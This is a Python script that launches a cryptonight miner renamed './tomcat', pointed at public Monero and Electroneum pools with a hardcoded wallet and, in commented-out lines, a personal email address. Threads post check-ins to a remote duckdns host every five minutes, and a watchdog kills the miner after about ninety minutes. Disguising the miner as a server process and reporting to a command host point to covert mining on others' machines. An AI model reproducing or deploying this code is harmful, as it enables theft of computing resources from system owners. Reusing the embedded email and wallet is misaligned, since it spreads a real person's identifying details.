import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:51:08.402247
#2018-02-17 16:38:01.496699
#2018-02-17 18:25:06.786938
#2018-02-17 20:13:02.222933
#2018-02-17 22:01:04.708150
#2018-02-17 23:45:03.891896
#2018-02-18 01:36:04.094740
#2018-02-18 03:22:07.238113
#2018-02-18 05:10:06.446015
#2018-02-18 07:02:08.097101
#2018-02-18 08:52:01.445559
#2018-02-18 10:38:06.301673
#2018-02-18 12:23:05.824673
#2018-02-18 14:11:06.188061
#2018-02-18 16:01:04.694216
#2018-02-18 17:50:02.872015
#2018-02-18 19:37:05.983385
#2018-02-18 21:22:01.870803
#2018-02-18 23:11:01.763157
#2018-02-19 00:57:03.698498
#2018-02-19 02:44:07.339050
#2018-02-19 04:47:04.964853
#2018-02-19 06:32:01.935482
#2018-02-19 08:21:05.455778
#2018-02-19 10:11:09.265105
#2018-02-19 11:59:02.122841
#2018-02-19 13:46:04.585597
#2018-02-19 15:36:08.454548
#2018-02-19 17:22:01.886600
#2018-02-19 19:10:04.607547
#2018-02-19 20:56:07.908490
#2018-02-19 22:44:05.572887
#2018-02-20 00:29:01.791381
#2018-02-20 02:16:04.921915
#2018-02-20 04:07:05.245193
#2018-02-20 05:50:08.126240
#2018-02-20 07:37:06.418705
#2018-02-20 09:22:07.610592
#2018-02-20 11:06:01.584426
#2018-02-20 12:52:04.802084
#2018-02-20 14:38:05.983366
#2018-02-20 16:22:10.216437
#2018-02-20 18:09:05.654000
#2018-02-20 19:59:06.438721
#2018-02-20 21:46:01.653373
#2018-02-20 23:29:06.364903
#2018-02-21 01:14:04.052222
#2018-02-21 03:03:05.522364
#2018-02-21 04:52:06.349250
#2018-02-21 06:40:07.200770
#2018-02-21 08:27:03.951137
#2018-02-21 10:13:08.209229
#2018-02-21 12:01:07.809368
#2018-02-21 13:50:01.452786
#2018-02-21 15:36:08.737497
#2018-02-21 17:27:01.671228
#2018-02-21 19:14:06.381275
#2018-02-21 21:02:07.252045
#2018-02-21 22:48:03.819555
#2018-02-22 00:33:06.905041
#2018-02-22 02:20:06.643672
#2018-02-22 04:08:01.923548
#2018-02-22 05:53:06.149442
#2018-02-22 07:39:03.890106
#2018-02-22 09:27:07.788841
#2018-02-22 11:14:04.704683
#2018-02-22 13:01:06.950050
#2018-02-22 14:49:02.165782
#2018-02-22 16:35:01.634790
#2018-02-22 18:23:09.747894
#2018-02-22 20:18:07.829381
#2018-02-22 22:05:06.788177
#2018-02-22 23:53:08.023853
#2018-02-23 01:43:04.130436
#2018-02-23 03:33:06.740443
#2018-02-23 05:19:06.269952
#2018-02-23 07:06:06.664271
#2018-02-23 08:57:01.301115
#2018-02-23 11:14:01.805931
#2018-02-23 13:07:05.747260
#2018-02-23 14:52:07.045549
#2018-02-23 16:41:06.017969
#2018-02-23 18:27:06.255077
#2018-02-23 20:12:07.442944
#2018-02-23 22:01:04.354861
#2018-02-23 23:49:06.715631
#2018-02-24 01:40:08.567331
#2018-02-24 03:29:03.618244
#2018-02-24 05:15:05.629821
#2018-02-24 07:03:02.090192
#2018-02-24 08:37:01.596425
#2018-02-24 10:08:03.789535
#2018-02-24 11:51:03.449459
#2018-02-24 13:19:05.709644
#2018-02-24 14:50:07.419969
#2018-02-24 16:22:04.387331
#2018-02-24 18:01:07.206857
#2018-02-24 19:29:01.948714
#2018-02-24 21:06:06.715533
#2018-02-24 23:09:03.563850
#2018-02-25 01:31:06.194085
#2018-02-25 05:20:09.275477
#2018-02-25 11:34:07.464561